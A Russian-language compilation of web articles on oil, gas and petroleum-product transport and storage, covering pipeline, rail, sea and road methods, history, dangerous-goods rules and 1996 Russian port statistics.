Транспорт и хранение нефти: перевозки продуктов нефтепереработки

Транспортировка газа, в большинстве случаев осуществляется по трубопроводам, причем несмотря на дорогостоящее строительство и обслуживание оборудования, этот вариант считается более экономически выгодным.

Для транспортировки газа используют и специальные танкеры-газовозы, на которых сжиженный продукт перевозится при определенных показателях температуры и давления.

Способов транспортировки нефти больше – кроме нефтепроводов, сырье перевозят в специальных авто- и железнодорожных цистернах, а также на морских и речных танкерах. Выбор в пользу того или иного способа зависит от дальности маршрута.

Для хранения газа, нефти и продуктов нефтепереработки предназначены резервуары, отличия между которыми – в конструкции, расположении (наземные, полуподземные или подземные) и материалах, используемых для их изготовления.

Автомобильный транспорт используется, как правило, для траспортировки сжиженного газа н анебольшие расстояния, например, до заправочной станции. Поскольку газ относится к категории опасных веществ, его перевозка осуществляется согласно правилам …

Строительство нефтепроводов осуществляется надземным способом, с использованием труб диаметра 53 см, имеющих пенополиуретановое нанесение с высокими теплоизоляционными характеристиками, толщина которых 10 см и оболочкой из оцинкованного металла, толщина которого составляет один

Производство резервуарных конструкций, ведётся в строгом соответствии со строительными нормами и правилами. Основными составными частями, таких изделий, как резервуары для хранения нефтепродуктов, являются: стенка, днище с окрайкой и крыша. Дополнительное технологическое оборудование, необходимое для безопасной эксплуатации, поставляется вместе с основной конструкцией (маршевые

На сегодняшний день самым распространенным способом является перевозка ГСМ водным транспортом. Это так называемые танкеры для перевозки нефтепродуктов. Данные суда

Нефтепровод бывает наземным и подземным и его прокладывают в соответствии с рельефом местности. В состав труб для нефтепровода входит высоко-пластичная сталь и армированный пластик, что обеспечивает его высокой надёжностью, устойчивостью к повреждениям, перепаду температур и коррозии. У наземных и подземных нефтепроводов есть свои плюсы и минусы. В первую очередь, наземный нефтепровод

    • Весовое оборудование, весы
    • Горно-добывающая отрасль
    • Двигатели
    • Деревообработка и заготовка
    • Конвейеры и транспортеры
    • Контрольно-измерительное оборудование
    • Крановое и подъемное оборудование
    • Легкая промышленность
    • Машиностроение
    • Металлургия
    • Насосы и насосное оборудование
    • Нефтегазовая промышленность
    • Новые технологии, изобретения
    • Переработка отходов и промышленных материалов
    • Пищевая промышленность
    • Пневмооборудование, компрессоры
    • Производственный процесс
    • Производство строительных материалов и оборудования
    • Промышленное оборудование
    • Склады, логистика
    • Трубы и трубопроводная арматура
    • Упаковка, маркировка товара
    • Химия и пластмассы
    • Электрика
      • Выключатели
      • Датчики, реле
      • Компьютерная техника, процессоры, полупроводники
      • Освещение, свет, лампы, светильники
      • Провода, кабели
      • Производство электроники
      • Трансформаторы, резисторы, электротехника
      • Электронные компоненты, контроллеры
    • Электрогенераторы
    • Энергетика и электротехника
    • Архитектура, проектирование
    • Вентиляция и кондиционирование
    • Водоснабжение и канализация
    • Инженерные коммуникации
    • Новые технологии, сооружения
    • Отопление, обогреватели, котлы
    • Пожаротушение, сигнализации
    • Строительное оборудование
    • Строительные материалы
      • Бетон
      • Геотекстиль
      • Гидроизоляция
      • Гипсокартон, перегородки
      • Железобетонные конструкции
      • Кирпич, блоки, пенобетон
      • Перекрытия
      • Плитка кафельная, тротуарная
      • Сухие смеси, штукатурка, шпаклевка
      • Утеплители, теплоизоляция
      • Фасадные материалы, устройство
      • Фундаменты
      • Цемент, песок, щебень
      • Черепица, кровля, устройство крыши
    • Строительные технологии
    • Строительный бизнес

Источник: https://promplace.ru/transportirovka-i-hranenie-nefti-i-gaza-staty/

Транспорт нефти и газа (стр. 1 из 6)

  • Содержание
  • 1. Транспорт нефти и газа
  • 1.1 Краткая история развития способов транспорта энергоносителей
  • 1.2 Железнодорожный транспорт
  • 1.3 Водный транспорт
  • 1.4 Автомобильный транспорт
  • 1.5 Трубопроводный транспорт
  • 2. Область применения различных видов транспорта
  • 3. Определение экономически наиболее выгодного диаметра трубопровода
  • Приложение
  • Список литературы

1. Транспорт нефти и газа

1.1 Краткая история развития способов транспорта энергоносителей

Нефть издавна транспортировали от мест добычи к местам потребления.

Археологи установили, что за 6000 лет до н.э. на берегу Евфрата в Иди существовал древний нефтяной промысел. Добытая нефть, в частности, переправлялась вниз по Евфрату к городу Ур и применялась в строительном деле. Для перевозки нефти по реке строились специальные наливные сосуды. Грузоподъемность этих древних «танкеров» достигала 5 т.

Издавна нефть хранили и перевозили в специальных сосудах. Так, нефть с территории бывшего Тмутараканского княжества Киевской Руси (Таманский полуостров) вывозилась византийскими кораблями в амфорах. Именно таманская нефть использовалась византийцами для изготовления их грозного боевого оружия — «греческого огня».

После разорения Константинополя крестоносцами и последующего крушения Византийской империи спрос па нефть упал и тмутараканские промыслы были надолго забыты. Позднее основным поставщиком нефти стал район Баку. Перевозили ее на верблюдах или арбах в кожаных мешках (бурдюках) в различные районы — в Шемаху, Гилян и даже в Западную Европу.

Во времена царствования Бориса Годунова (1598…1605 гг.) нефть привозили в Москву из Печорских лесов с реки Ухты в бочках. Бочки различного размера длительное время служили емкостями для перевозимой нефти на трактах и на водных путях как в нашей стране, так и за рубежом.

Первая в России инструкция о правилах перевозки нефти на судах по Каспию и Волге была утверждена Петром I в 1725 г. Использовались для этих целей сухогрузы — гребные, парусные и паровые суда, на которые нефть грузилась в амфорах или бочках.

Первые нефтеналивные суда, отличающиеся тем, что в их трюме размещались специальные емкости для налива нефти, появились в конце XIX века, когда на нее резко возрос спрос. В 1873 г. братья Артемьевы приспособили под налив нефти деревянную парусную шхуну «Александр». А первым в мире металлическим нефтеналивным судном стал пароход «Зороастр», построенный в 1878 г.

по русскому проекту на шведской верфи. Для обеспечения пожарной безопасности его грузовые трюмы (танки) были отделены от машинного отделения двойной перегородкой, внутрь которой заливалась вода. Пароход «Зороастр» грузоподъемностью 250 т, ходивший по Каспийскому морю, стал первым в мире танкером. В 1882 г.

российскими инженерами был создан танкер «Спаситель», машинное отделение которого впервые в мировой практике было вынесено на корму — так, как это делается теперь у современных танкеров.

Большую роль в развитии отечественного нефтеналивного флота сыграл выдающийся русский инженер В.Г. Шухов. Под его руководством в Саратове были построены первые речные нефтеналивные баржи русского проекта. Впервые в мире они собирались из отдельных секций, что позволило сократить сроки спуска барж со стапелей.

Железнодорожную цистерну придумали американцы. К началу нефтяной лихорадки территория США уже была покрыта сетью железных дорог. Поэтому вполне естественно, что эта сеть стала использоваться для транспортирования нефти.

Русские владельцы железных дорог долго сопротивлялись применению железнодорожных цистерн, с одной стороны, справедливо опасаясь пожароопасное™ нефти, а с другой — учитывая, что кпд цистерн составляет 50%, т.

к груз перевозится только в одном направлении, а в обратную сторону цистерны движутся порожняком. Однако их достоинства — значительная грузоподъемность, возможность быстрой разгрузки и заполнения цистерн в конце концов сделали свое дело. В 1872 г.

мастерскими Московско-Нижегородской железной дороги были изготовлены первые в России железнодорожные нефтеналивные цистерны.

В 1863 г.Д.И. Менделеев, посетивший нефтеперегонный завод В.А. Кокорева близ Баку, предложил использовать трубопровод для перекачки нефти от нефтяных колодцев до завода и от завода до причала на Каспийском море. Тогда его предложение не было осуществлено.

А в 1865 г. в США фирмой «Стандарт ойл» был построен первый в мире нефтепровод
диаметром 50 мм и длиной 6 км. «Американцы как бы подслушали мои мысли», — с некоторой горечью писал впоследствии Дмитрий Иванович.

Строительство первого в мире нефтепровода было осуществлено с целью сбить высокие железнодорожные тарифы на перевозку нефти. Сама же идея транспортирования жидкостей по трубам не являлась новой.

  1. Еще в пятом тысячелетии до нашей эры китайцы транспортировали воду по бамбуковым трубам на рисовые поля.
  2. 5000 лет назад в древнеиндийском городе Мохенджо-Даро стоки из некоторых домов отводились по глиняным трубам.
  3. В Древнем Египте добываемая из глубоких колодцев вода отводилась по деревянным, медным и свинцовым трубам.

В Кносском дворце на о. Крит за 2000 лет до н.э. терракотовые трубы использовались для водоснабжения и отвода сточных вод.

В Древнем Риме свинцовые трубопроводы использовались для подачи питьевой воды и снабжения водой общественных бань. Самый крупный из них имел длину 91 км.

В XI веке был сооружен водопровод из деревянных труб для подачи воды в Новгород из р. Волхов. Внутренний диаметр труб составлял 140 мм, а наружный — 300 мм. Подобные деревянные водопроводы существовали и в других городах России, в частности, в Бугуруслане и в Тюмени.

Первый напорный водопровод на Руси был построен в Московском Кремле в 1631…1633 гг.: по свинцовым трубам при помощи водоподъемной машины вода подавалась в различные службы.

Современные способы транспортирования нефти, нефтепродуктов и газа

В настоящее время для транспортирования энергоносителей используют железнодорожный, водный, автомобильный и трубопроводный транспорт.

1.2 Железнодорожный транспорт

Транспортирование энергоносителей по железной дороге производится в специальных цистернах или в крытых вагонах в таре.

Конструктивно цистерна состоит из следующих основных частей (рис.1): рамы 7, ходовой части 6, ударнотяговых устройств 5, тормозного оборудования 8, котла 4, внутренней 3 и наружной 10 лестниц, устройств крепления котла к раме 11, горловины 1 и сливного прибора 9, предохранительной арматуры 2.

Рис.1 Цистерна для перевозки бензина и светлых нефтепродуктов (модель15-1443): 1-горловина, 2-предохранительная арматура, 3-внутренняя лестница,4-котел, 5-ударнотяговые устройства, 6 — ходовая часть, 7-рама, 8-тормозноеоборудование, 9-сливной прибор, 10-наружная лестница, 11-устройства крепления котла к раме.

Рама служит для восприятия тяговых усилий, ударов в автосцепку, а также инерционных сил котла, возникающих при изменении скорости движения цистерны. По типу ходовой части различают 4-х и 8-ми осные цистерны (рис.2).

Рис.2 Восьмиосная цистерна для бензина (модель15-1500)

На большинстве цистерн устанавливается бессекционный котел, который состоит из цилиндрической части и двух днищ. Котел крепится к раме с помощью специальных болтов, а по краям — четырьмя хомутами с муфтами и натяжными болтами.

В верхней части котла цистерн для нефти и нефтепродуктов смонтирован колпак с люком, предназначенный для их загрузки, а в нижней — сливной прибор для их выгрузки. Загрузка и выгрузка сжиженных газов производится через специальные патрубки с вентилями.

Предохранительная арматура служит, в основном, для предотвращения разрушения котла цистерн при повышении давления.

Различают следующие виды цистерн. Цистерны специального назначения в основном предназначены для перевозки высоковязких и высокопарафинистых нефтей и нефтепродуктов. Цистерны с паровой рубашкой отличаются от обычных тем, что нижняя часть у них снабжена системой парового подогрева с площадью поверхности нагрева около 40 м2
.

Цистерны-термосы предназначены для перевозки подогретых высоковязких нефтепродуктов; они покрыты тепловой изоляцией, а внутри котла у них установлен стационарный трубчатый подогреватель с поверхностью нагрева 34 м2
.

Цистерны для сжиженных газов
рассчитаны на повышенное давление (для пропана — 2 МПа, для бутана — 8 МПа).

Объем котла современных цистерн составляет от 54 до 162 м3
, диаметр — до 3,2 м.

В качестве тары при перевозке нефтегрузов в крытых вагонах используются бочки (обычно 200 литровые) и бидоны. В бочках транспортируются светлые нефтепродукты и масла, а в бидонах — смазки.

  • Достоинствами
    железнодорожного транспорта являются:
  • 1) возможность круглогодичного осуществления перевозок;
  • 2) в одном составе (маршруте) могут одновременно перевозиться различные грузы;
  • 3) нефть и нефтепродукты могут быть доставлены в любой пункт страны, имеющий железнодорожное сообщение;
  • 4) скорость доставки грузов по железной дороге примерно в 2 раза выше, чем речным транспортом.
  • К недостаткам железнодорожного транспорта относятся:
  • 1) высокая стоимость прокладки железных дорог;
  • 2) увеличение загрузки существующих железных дорог и как следствие — возможные перебои в перевозке других массовых грузов;
  • 3) холостой пробег цистерн от потребителей нефтегрузов к их производителям.

1.3 Водный транспорт

Широкое применение водного транспорта в нашей стране предопределено тем, что по протяженности водных путей Россия занимает первое место в мире. Длина береговой морской линии России, включая острова, составляет около 100 тыс. км.

В нашей стране свыше 600 крупных и средних озер, а суммарная протяженность рек составляет около 3 млн. км.

Каналы имени Москвы, Волго-Донской, Беломорско-Балтийский и Волго-Балтийский связывают водные пути Европейской части России и порты Балтийского, Белого, Каспийского, Азовского и Черного морей.

Источник: https://mirznanii.com/a/219908/transport-nefti-i-gaza

Способы транспортировки нефти — Пути российской нефти

 Энциклопедия технологий

Россия является одним из лидеров нефтяного рынка (по итогам 2015 года добыча составила 534 млн тонн).

Крупные, средние и малые месторождения расположены по всей территории страны, их эксплуатация невозможна без решения вопроса о способе транспортировки.

Выбранный вид транспорта должен обеспечить постоянность поставок, независимо от сезонных и прочих факторов, поскольку добычу на многих месторождениях, например, расположенных в условиях Крайнего Севера, просто невозможно остановить. 

Виды транспортировки нефти

Существует четыре основных вида транспортировки: железнодорожный, водный, автомобильный и трубопроводный. Выбор в пользу той или иной формы зависит от того, насколько она сможет обеспечить регулярность, и от себестоимости, которая связана с расположением нефтепромыслов, нефтеперерабатывающих заводов (НПЗ) и другими факторами.

Например, все регионы страны охватывает сеть автомобильных дорог. Однако из-за ограничения грузоподъемности автомобилей у этой формы транспорта очень высокая себестоимость. Поэтому автомобильные перевозки используются лишь на короткие расстояния и преимущественно для нефтепродуктов. 

Значительно ниже себестоимость водного транспорта, который делится на морские и речные перевозки. Однако и у него есть несколько важных ограничений. Во-первых, он доступен далеко не везде — многие месторождения и НПЗ расположены в глубине континента. Во-вторых, из-за сезонности и особенностей климатических условий навигация по некоторым маршрутам доступна лишь в летний период. 

Этих недостатков лишены железнодорожный и трубопроводный виды транспорта, использование которых доступно практически в любых погодных условиях и на любые расстояния. В железнодорожных перевозках применяются специальные цистерны.

Состав из таких вагонов формирует наливной маршрут. Себестоимость перевозки вагонов обратно пропорциональна их количеству. Однако железнодорожный транспорт также имеет существенные недостатки.

Ключевые из них — большие капитальные вложения при строительстве и реконструкции путей, относительно высокие эксплуатационные расходы. 

Единственный вид транспорта нефти, для которого характерны низкие операционные издержки — трубопроводный.

Он может использоваться как для перекачки нефти (нефтепроводы), так и для перекачки различных нефтепродуктов (нефтепродуктопроводы). Сейчас по трубопроводам проходит более 90% добываемой в стране нефти.

Длина магистральных трубопроводов, находящихся под управлением ОАО «АК «Транснефть», превышает 70 тыс км. 

В отдельных случаях нефтепродукты доставляют потребителям авиатранспортом, например, для срочной переброски горючего в небольших количествах или в малодоступные места, при невозможности использовать другие виды транспорта. 

Смешанные транспортировки

Очень часто конечный потребитель расположен достаточно далеко от мест добычи и транспортировки. Как правило, в таких случаях не удается организовать «прямые поставки» и приходится передавать нефтяные грузы с одного вида транспорта на другой. Перемещение грузов несколькими видами транспорта называется смешанными перевозками. 

Например, нефтепродукты с нефтеперерабатывающего завода могут перевозиться морем с помощью танкеров. Затем в устье реки их перекачивают в баржу, плывущую на головную станцию нефтепродуктопровода, по которому транспортируются на распределительные нефтебазы.

Оттуда через железные дороги они будут распределены по мелким нефтебазам, которые с помощью бензовозов переправят их конечным потребителям.

Чаще всего встречается сочетание трубопроводного с железнодорожным транспортом, на долю которых приходится более 80% перевозок.

Источник: http://discoverrussia.interfax.ru/wiki/22/

Транспортировка нефтепродуктов

Одним из наиболее востребованных богатств природных недр является нефть. Нефтяную продукцию транспортируют в самые разные части света. Для транспортировки разработаны разные варианты, из которых выбирают в зависимости от конкретных условий. Самым распространенным способом можно назвать перевозку с использованием железнодорожного транспорта.

В качестве альтернативных способов транспортировки можно перечислить следующие:

  • перевозка на водном транспорте (танкеры);
  • перевозка на автомашинах;
  • прогон по нефтепроводу.

Чтобы подробнее ознакомиться с преимуществами и недостатками перечисленных способов, рассмотрим каждый из них по отдельности.

Перевозки с использованием автомобильного транспорта

Перевозку нефтепродуктов на автомашинах нельзя охарактеризовать, как наиболее распространенный способ. По сравнению с прочими у него имеется ряд недостатков. Например, с использованием автомобилей нельзя перевезти большое количество продукции. Но автоцистерны все же используют, когда требуется перевезти груз на небольшое расстояние.

Поскольку груз относят к категории опасных, транспорт должен иметь специализированную оснастку. Автомашина проходит проверки, регистрируется в надзорных органах, оснащается знаками, хорошо подготовленным оборудованием.

Оснастка стоит недешево, поэтому перевозки нефтепродуктов с использованием автомобилей не являются выгодными, если сравнить с прочими вариантами.

Прочие виды транспортировки можно охарактеризовать как более приемлемые, если предстоит переместить груз на немалое расстояние.

Транспортировка с использованием трубопровода

Процесс транспортировки нефтепродукции с использованием специально оборудованного трубопровода является недорогим и относительно безопасным методом.

По нефтяным трубопроводам транспортируют нефть от одного города к другому или перегоняют между разными государствами. Работа трубопроводов осуществляется с использованием специальных насосов, установленных на каждом из концов трубы.

Они обеспечивают определенное давление внутри труб, что и заставляет нефть передвигаться по трубопроводу от одной точки к другой.

Можно указать два вида трубопроводов, которые используют с целью переправления нефтяной продукции. Это подземные и надземные трубопроводы. В разных условиях они могут работать с одинаковой эффективностью.

Но следует принимать во внимание, что при возникновении неисправностей и аварий ремонт легче производить на надземном виде трубопровода.

Подземный трубопровод меньше подвергается влиянию внешних факторов, окружающая среда влияет на его состояние в иной степени, в отличии от надземного.

Перевозка нефтепродуктов по морю

Транспортировка с использованием морского танкера применяется как наиболее выгодный способ.

У танкера немалый объем водоизмещения, и с его помощью можно перевозить значительно большие объемы продукции.

Среди плюсов данного типа перевозок можно упомянуть и то, что иногда передвижение по морскому пути оказывается более коротким. Продукция будет доставлена на место в несколько раз быстрее.

Данный способ по вышеперечисленным причинам обойдется намного дешевле прочих.

Танкеры, используемые при перевозках, могут быть следующих типов:

  • малотоннажные;
  • крупнотоннажные;
  • среднетоннажные.

Танкеры выполняются с двойной обшивкой, обеспечивающей повышенную безопасность при эксплуатации. Производится непременное оснащение судна перегородками, в которых имеются специальные отсеки для нефтепродуктов.

Транспортировка по железной дороге

Нередко при необходимости перевезти нефтепродукты применяется железнодорожный транспорт. Но нельзя сказать, что данный способ отличается большим распространением.

Во-первых, он достаточно дорого обходится, что по шкале популярности отодвигает его дальше, чем транспортировка с использованием трубопровода. Во-вторых, данный способ несет риски для здоровья обслуживающего персонала и, соответственно, требует соблюдения большего количество правил и стандартов, что дополнительно осложняет процесс.

Такой тип перевозки требует наличия специально подготовленного оборудования, а также вагонов-цистерн с оснасткой в соответствии стандартам безопасности.

Источник: https://promdevelop.ru/transportirovka-nefteproduktov/

Амистад: продажа топлива оптом

Экономика множества стран основывается на нефти. Это полезное ископаемое нашло применение в большинстве сфер хозяйственной деятельности человека, включая не только получение различных видов энергии, но и производство лекарств и косметики. Что же такое нефть, и как строятся процессы ее добычи и использования?

Нефть – это ископаемое топливо, черная маслянистая жидкость с горючими свойствами и своеобразным запахом. Она представляет собой сложную смесь углеводородов и других химических элементов.

Добыча нефти – это многоступенчатый промышленный процесс, который включает следующие стадии:

  1. Разведка месторождений.
  2. Бурение скважин.
  3. Извлечение и сбор нефти и попутного газа.
  4. Очистка сырья от воды, примесей и пр.
  5. Транспортировка к НПЗ.

Места добычи нефти называются нефтяными промыслами или месторождениями. Их определяют с помощью геологической разведки местности. Нефть может залегать не только глубоко под землей, но и на дне морей и океанов, на шельфах. Нефтяные компании постоянно исследуют новые районы добычи нефти и совершенствуют технологии, чтобы наращивать объемы полученного сырья.

Способы добычи нефти

Способы добычи зависят от давления в разрабатываемом пласте нефти.

1. Фонтанный способ. Как правило, в начале разработки месторождения нефть фонтанирует из скважины (поднимается по стволу коллектора) самостоятельно. Это происходит из-за высокого водяного давления на дне скважины. Постепенно в процессе добычи внутреннее давление снижается и выработка скважины (дебит нефти) уменьшается быстрыми темпами.

2. Механизированный способ. В его основе лежит применение различных глубинных насосов для «выкачивания» нефти на поверхность. Для прокачки используют штанговые глубинные насосы, электроприводные центробежные насосы.

3. Гидроразрыв пласта. В рабочем пласте образуют трещину, в результате чего давление в забое снижается и нефть добывается фонтанным способом.

Обработка нефти

Цель обработки нефти – получение различных видов топлива (бензин, керосин, ДТ, СМТ, печное топливо и пр.), а также сырья для химической промышленности.

Этапы обработки нефти:

  1. Подготовка сырья.
  2. Прямая перегонка нефти (первичная обработка).
  3. Вторичная обработка.
  4. Очищение полученных продуктов.

Транспортировка нефти

Соединение мест добычи нефти с местами ее переработки (НПЗ) называется транспортировкой и является жизненно важным процессом для нефтяной промышленности.

Транспортировка нефти осуществляется разными способами:

По нефтепроводу. Это самый эффективный и бюджетный способ доставки нефти к НПЗ и к местам погрузки на танкеры. Нефтепроводы прокладываются преимущественно под землей и позволяют транспортировать огромные объемы сырья.

По водным путям. Перевозка нефти морскими путями используется для доставки в соседние государства, а речными путями – для перемещения внутри страны. В обоих случаях нефть перевозят специальные грузовые суда – танкеры, грузоподъемность которых доходит до 30 000 т.

• Транспортировка нефти по железной дороге. Железнодорожные цистерны могут перевозить относительно небольшие объемы нефти и используются в основном для доставки сырья в отдаленные регионы.

Автомобильным транспортом. Автомобили-бензовозы заправляются автоналивом на специальных эстакадах и используются для перевозки небольших объемов продукции, в основном готовых нефтепродуктов для конечных потребителей. Для перевозки сырой нефти такой способ слишком затратен.

Перевалка нефти и нефтепродуктов – это перемещение сырья с одного вида транспорта на другой.

Хранение нефти и нефтепродуктов обеспечивают нефтебазы – организованные хранилища нефти различного масштаба. Нефть в них хранится в специальных вертикальных наземных или подземных резервуарах и именно отсюда осуществляется реализация нефти и ее производных топливным компаниям и АЗС.

Источник: https://oilselling.ru/2018/06/25/neft-i-dobycha/

Правила перевозки нефти и нефтепродуктов

Главная  —  Информация

Правила перевозки опасных грузов распространяются на транспортировку нефти, а также значительной части нефтепродуктов. Нефть, легко воспламеняющаяся жидкость с номером ООН (UN) 1267, относится к опасным грузам 3 класса. А продукты, которые получают из нефтяного сырья, очень отличаются от исходного сырья и друг от друга физическими и химическими свойствами. 

Нефтепродуктами являются:

  • СУГ – вещества 2 класса опасности;
  • керосин, бензин, дизельное и ракетное топливо, мазут – ЛВЖ, 3 класс;
  • минеральные масла – трансмиссионные, смазочные, изоляционные, гидравлические, вазелиновые;
  • прочие нефтяные ГСМ;
  • битум (ООН 3257) – малоопасный продукт 9 класса (9.1), который перевозят в разогретом состоянии;
  • парафины, церезины – твердые горючие вещества, класс опасности 4.

Природную нефть перегоняют по нефтепроводу, перевозят наземным и морским транспортом. Порядок перевозки нефтепродуктов зависит от физико-химических характеристик конечных товаров. Продукты нефтепереработки доставляют к месту назначения в России и за рубежом:

  • автотранспортом;
  • по железной дороге;
  • морскими и речными судами;
  • самолетом или вертолетом в случае особой важности или срочности.

Правила перевозки нефтепродуктов автомобильным транспортом

При перевозке нефтяных продуктов автомобильным транспортом основным нормативным документом в России, Европе, странах Ближнего Востока и ЮВА является соглашение ADR/ДОПОГ:

  • Разработано на основе Типовых Правил ООН и системы классификации и маркировки опасных веществ СГС (GHS).
  • Диктует участникам единый порядок, нормы и требования, которые необходимо выполнять и соблюдать при работе с опасными грузами, включая нефтяные.

Продукцию нефтепереработки перемещают автотранспортом по дорогам общего пользования:

  • наливом в автоцистернах, танк-контейнерах;
  • в индивидуальной упаковке или транспортной таре назначенной группы.

Требования к автотранспорту

Автомобили, прицепы, цистерны для перевозки нефтехимии:

  • имеют конструкционные особенности, допущены к работе с ОГ нужного класса, что подтверждено действующим свидетельством ДОПОГ;
  • находятся под управлением аккредитованного водителя со свидетельством ДОПОГ;
  • полностью исправны, очищены от остатков предыдущего груза, прошли предрейсовый осмотр;
  • экипированы средствами пожаротушения, индивидуальной защиты для экипажа;
  • маркированы должным образом информационными табличками, характерными надписями.

Документы для автодоставки нефтехимии

Автомобильную доставку продуктов переработки нефти выполняют только при наличии правильно оформленных документов:

  • коммерческих;
  • технических – паспорт продукта, паспорт безопасности, аварийная карточка;
  • транспортных с отметками об опасности;
  • разрешительных – допуски для машины/водителя, согласованная маршрутная карта, разрешение Минтранса/уполномоченных ведомств других стран.

Правила перевозки отдельных нефтепродуктов в освобожденном и/или ограниченном упаковкой количестве подробно описаны в части 3 ДОПОГ.

Правила перевозки нефти на жд транспорте

По железной дороге нефтепродукты перевозят в железнодорожных цистернах, наливных и универсальных контейнерах, крытых вагонах.

Транспортные емкости, контейнеры, вагоны с ОГ после затарки маркируют:

  • символикой опасности, информацией с номером ООН, классификационным кодом;
  • трафаретом «Срочный возврат на (наименование станции приписки, владельца терминала);
  • надписью «аренда» либо «собственность» со ссылкой на собственника или арендатора.

Железнодорожную накладную для внутрироссийской доставки нефтехимии заполняют на русском языке.

Международную жд накладную СМГС или ЦИМ/СМГС оформляют на 2-х или 3-х языках: русском, немецком/французском/английском. При отправке товаров в Китай информация дублируется на китайском.

Перевозка нефти морем

Правила перевозки сырой, очищенной и переработанной нефти морским транспортом приведены в кодексе МК МПОГ (ММОГ) с добавлениями и поправками, а также международных конвенциях:

  • МАРПОЛ 73/78 – о предотвращении загрязнения мировых вод;
  • СОЛАС-74 – конвенция по охране человеческой жизни на море.

Нефтехимию, СУГ, топливо перевозят нефтеналивными или газовыми танкерами, в специальных танкер-контейнерах, а также в универсальных при наличии транспортной упаковки.

После размещения товаров на борту, ответственность за груз до прибытия в порт назначения несет капитан торгового судна. Поэтому нефтепродукты принимают к погрузке на водный транспорт:

  • только при наличии коммерческих документов, технического паспорта и MSDS;
  • в целой, герметичной, без следов повреждения упаковке назначенной группы;
  • после проверки целостности танк- или универсального контейнера;
  • при условии обязательной маркировки грузовой единицы информационными надписями, символикой опасности.

Для размещения ОГ на морском судне техническая служба разрабатывает и согласует отдельный план.

Компания «Итака-Транс» организует перевозки нефтепродуктов по России, СНГ, странам дальнего зарубежья. При международных грузоперевозках, оказываем дополнительные услуги:

  • таможенные;
  • представительские в порту, на складских терминалах Санкт-Петербурга;
  • организуем перевалку, ответственное хранение;
  • помогаем оформлять разрешительные документы.

Консультируем грузовладельцев на всех этапах транспортировки нефтехимии. Организуем налив/перелив, фасовку жидкостей в Санкт-Петербурге. Предоставляем цистерны, танк-контейнеры для поставки жидких продуктов наливом.

Источник: https://itakatrans.ru/informatsiya/pravila-perevozki-nefti-i-nefteproduktov

Проблемы транспортировки нефти и нефтепродуктов

Резервуары и технологическое оборудование » Подбор оборудования » Статьи 

Б.А.Носов, доктор экономических наук, зам. директора СоюзморниипроектаН.В.Куликов, президент Компании «Лукойл-Арктик-Танкер»

До настоящего времени в мире основным горючим материалом остаются нефть и нефтепродукты. Только транспорт, использующий двигатели внутреннего сгорания, а это более 400 млн. автомобилей, 70 тыс. судов, не считая авиации, сельхозмашин и военной техники, потребляет более 60% всех производимых нефтепродуктов.

Места добычи нефти находятся, в основном, на значительном удалении от мест ее потребления, причем зачастую они разделены большими водными пространствами, поэтому нефть и нефтепродукты являются одним из основных грузов для перевозки морем. Доля нефтегрузов составляет примерно 38% объема всех перевозимых морем грузов, а в количественном выражении это в 1996 г. составило около 1,4 млрд. т, согласно прогнозу, к 2000 г. этот объем увеличится до 1,53 млрд. т.

В 1996 г. в России было добыто нефти примерно 300 млн. т, ранее в СССР — 600 млн. т (максимум был достигнут в 1988 г. — 624 млн. т).

В последние годы в России наблюдается устойчивая тенденция снижения добычи нефти. Это обуславливается следующими причинами:

  • отсутствие инвестиций на разведку новых месторождений и их освоение, на применение новых технологий;
  • увеличение себестоимости добываемой нефти (с 1965 г. увеличилась более чем в 5 раз), что связано со смещением добычи нефти в северные и арктические районы с более тяжелыми климатическими условиями, необходимостью увеличения расходов на охрану окружающей среды, увеличением глубины бурения;
  • рост стоимости транспортировки нефти, так как продвижение мест добычи на север не только удорожает ее добычу, но и удорожает доставку ее к местам переработки или продажи.

Внешняя торговля России базируется на экспорте энергоносителей, которые составляют более 65% всех экспортируемых грузов, из них более 45% — это нефть и нефтепродукты.

После распада СССР основные месторождения нефти остались в России и она приняла на себя основные обязательства по поставкам нефти и нефтепродуктов на экспорт. В 1996 г. экспорт нефти и нефтепродуктов составил примерно 100 млн.

 т и практически остался на том же уровне, что и в бывшем СССР.

Транспортировка нефти и нефтепродуктов на экспорт осуществляется преимущественно двумя видами транспорта: трубопроводным и морским. Трубопроводным транспортом нефть поставляется в страны Европы.

На территории России нефтепровод заканчивается на станции Унеча, далее он идет на Ново-Полоцк (Белоруссия) и здесь разветвляется на две нитки. Одна идет на порт Вентспилс (Латвия), другая — на Мозырь и далее через Украину в Чехию, Словакию, Венгрию, Польшу, Германию и другие страны.

В некоторые страны Западной Европы и страны, расположенные в других частях мира, транспортировка нефти и нефтепродуктов производится морским транспортом через морские нефтеперевалочные комплексы.

С распадом социалистической системы объемы транспортировки нефти трубопроводным транспортом в страны Европы стали сокращаться, в то время как роль морского транспорта возрастает. Сегодня большинство проектов по увеличению добычи нефти и ее экспорту связано с морским транспортом.

Необходимо отметить, что значительные валютные поступления Россия получает не только от продажи самих нефтегрузов, но и от их транспортировки морским транспортом. Процесс транспортировки нефтегрузов морским транспортом состоит из двух составляющих:

  • перевалка с берега на специализированные морские суда;
  • перевозка специализированными морскими судами.

Перевалка нефтегрузов на специализированные морские суда производится на морских нефтеперевалочных комплексах и припортовых нефтяных терминалах.

В России морские нефтеперевалочные комплексы и припортовые нефтяные терминалы имеются во всех морских бассейнах (Азово-Черноморский, Балтийский, Северный, Дальневосточный), однако они существенно отличаются по своим мощностям, технической оснащенности, наличию подходов к ним магистральных нефтепроводов.

Объемы перевалки нефтегрузов в морских портах России за 1996 г.

НаименованиеОбъемы бассейнов, нефтегрузов, портов (млн. т)
Азово-Черноморский бассейн
Новороссийск 35,2
Туапсе 10,5
Кавказ 0,4
Итого: 46,1
Балтийский бассейн
Санкт-Петербург 3,7
Калининград 0,8
Итого: 4,5
Северный бассейн
Архангельск 0,4
Мурманск 0,2
Итого: 0,6
Дальневосточный бассейн
Владивосток 0,6
Находка 3,0
Ванино 1,3
Прочие 0,6
Итого: 5,5
Итого по портам России 56,7

Грузооборот всех портов России по нефтегрузам составил в 1996 г. 56,7 млн. т (см. табл.). Из них примерно 50 млн. т — экспорт нефти и нефтепродуктов, а 6,7 млн. т приходится на каботажные перевозки, включая завоз грузов в районы Крайнего Севера и местности, приравненные к ним, а также на бункеровку судов.

Основные нефтеперевалочные комплексы находятся в Азово-Черноморском бассейне. Они расположены в портах Новороссийск и Туапсе и связаны трубопроводами с местами добычи нефти. Самым крупным в России является морской нефтеперевалочный комплекс в порту Новороссийск.

